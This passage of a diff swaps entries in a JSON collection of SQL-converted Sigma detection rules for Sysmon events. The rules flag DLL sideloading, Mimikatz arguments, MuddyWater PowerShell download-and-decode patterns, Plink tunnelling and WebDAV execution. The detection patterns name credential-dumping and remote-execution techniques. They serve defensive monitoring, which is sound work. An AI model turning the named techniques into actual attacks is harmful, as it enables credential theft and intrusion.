"author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' AND Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" ], - "filename": "image_load_susp_dll_load_system_process.yml" + "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack", - "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "title": "Execution via WorkFolders.exe", + "id": "0bbc6369-43e3-453d-9944-cae58821c173", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the uncommon Windows Work Folders feature." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" ], - "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "proc_creation_win_susp_workfolders.yml" }, { - "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", - "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", - "status": "experimental", - "description": "Detects the image load of vss_ps.dll by uncommon executables", - "author": "Markus Neis, @markus_neis", + "title": "Suspicious Plink Port Forwarding", + "id": "48a61b29-389f-4032-b317-b30de6b95314", + "status": "test", + "description": "Detects suspicious Plink tunnel port forwarding to a local port", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR Image LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "image_load_dll_vss_ps_susp_load.yml" + "filename": "proc_creation_win_plink_port_forwarding.yml" }, { - "title": "DLL Sideloading Of ShellChromeAPI.DLL", - "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", - "status": "experimental", - "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - PurpleSharp Execution", + "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "status": "test", + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1587", + "attack.resource_development" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_shell_chrome_api.yml" + "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" }, { - "title": "Potential DLL Sideloading Via comctl32.dll", - "id": "6360757a-d460-456c-8b13-74cf0e60cceb", + "title": "PUA - 3Proxy Execution", + "id": "f38a82d2-fba3-4781-b549-525efbec8506", "status": "experimental", - "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", + "description": "Detects the use of 3proxy, a tiny free proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unlikely" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_comctl32.yml" + "filename": "proc_creation_win_pua_3proxy_execution.yml" }, { - "title": "Svchost DLL Search Order Hijack", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", - "status": "test", - "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", - "author": "SBousseaden", + "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", + "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1574.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of AnyDesk from a non-standard folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR Image LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_svchost_dlls.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" }, { - "title": "HackTool - SharpEvtMute DLL Load", - "id": "49329257-089d-46e6-af37-4afce4290685", - "status": "experimental", - "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential MuddyWater APT Activity", + "id": "36222790-0d43-4fe8-86e4-674b27809543", + "status": "test", + "description": "Detects potential Muddywater APT activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.g0069" ], "falsepositives": [ - "Other DLLs with the same Imphash" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" ], - "filename": "image_load_hktl_sharpevtmute.yml" + "filename": "proc_creation_win_apt_muddywater_activity.yml" }, { - "title": "HackTool - SILENTTRINITY Stager DLL Load", - "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "title": "Potential ACTINIUM Persistence Activity", + "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", "status": "test", - "description": "Detects SILENTTRINITY stager dll loading activity", - "author": "Aleksey Potapov, oscd.community", + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" ], - "filename": "image_load_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_apt_actinium_persistence.yml" }, { - "title": "Possible Process Hollowing Image Loading", - "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", - "status": "test", - "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", - "author": "Markus Neis", + "title": "Sdiagnhost Calling Suspicious Child Process", + "id": "f3d39c45-de1a-4486-a687-ab126124f744", + "status": "experimental", + "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ - "Very likely, needs more tuning" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\'))" ], - "filename": "image_load_susp_uncommon_image_load.yml" + "filename": "proc_creation_win_sdiagnhost_susp_child.yml" }, { - "title": "Suspicious UltraVNC Execution", - "id": "871b9555-69ca-4993-99d3-35a59f9f3599", + "title": "HackTool - Mimikatz Execution", + "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", "status": "test", - "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", - "author": "Bhabesh Raj", + "description": "Detection well-known mimikatz command line arguments", + "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.g0047", - "attack.t1021.005" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ultravnc_susp_execution.yml" + "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" }, { - "title": "Suspicious File Execution From Internet Hosted WebDav Share", - "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", - "status": "experimental", - "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", - "author": "pH-T (Nextron Systems)", + "title": "Suspicious Rundll32 Activity Invoking Sys File", + "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", + "status": "test", + "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" + "filename": "proc_creation_win_rundll32_sys.yml" }, { - "title": "Renamed PAExec Execution", - "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", - "status": "test", - "description": "Detects execution of renamed version of PAExec. Often used by attackers", - "author": "Florian Roth (Nextron Systems), Jason Lynch", + "title": "Mshtml DLL RunHTMLApplication Abuse", + "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "status": "experimental", + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + }, + { + "title": "CMSTP Execution Process Creation", + "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", - "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\paexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmstp.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_paexec.yml" + "filename": "proc_creation_win_cmstp_execution_by_creation.yml" }, { - "title": "PUA - Radmin Viewer Utility Execution", - "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "title": "ZOHO Dctask64 Process Injection", + "id": "6345b048-8441-43a7-9bed-541133633d7a", "status": "test", - "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", - "author": "frack113", + "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_radmin.yml" + "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Execution", - "id": "93bbde78-dc86-4e73-9ffc-ff8a384ca89c", + "title": "Suspicious Add Scheduled Command Pattern", + "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", "status": "experimental", - "description": "Detects execution of known compromised version of 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious scheduled task creations with commands that are uncommon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate usage of 3CXDesktopApp" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((OriginalFileName = '3CXDesktopApp.exe' OR Image LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' OR Product = '3CX Desktop App') AND FileVersion LIKE '%18.12.%' ESCAPE '\\') OR ((Hashes LIKE '%SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=480DC408EF50BE69EBCF84B95750F7E93A8A1859%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B43A5D8B83C637D00D769660D01333E88F5A187%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA%' ESCAPE '\\' OR Hashes LIKE '%MD5=BB915073385DD16A846DFA318AFA3C19%' ESCAPE '\\' OR Hashes LIKE '%MD5=08D79E1FFFA244CC0DC61F7D2036ACA9%' ESCAPE '\\' OR Hashes LIKE '%MD5=4965EDF659753E3C05D800C6C8A23A7A%' ESCAPE '\\' OR Hashes LIKE '%SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203%' ESCAPE '\\' OR Hashes LIKE '%SHA1=E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8433A94AEDB6380AC8D4610AF643FB0E5220C5CB%' ESCAPE '\\' OR Hashes LIKE '%SHA1=413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5%' ESCAPE '\\' OR Hashes LIKE '%MD5=9833A4779B69B38E3E51F04E395674C6%' ESCAPE '\\' OR Hashes LIKE '%MD5=704DB9184700481A56E5100FB56496CE%' ESCAPE '\\' 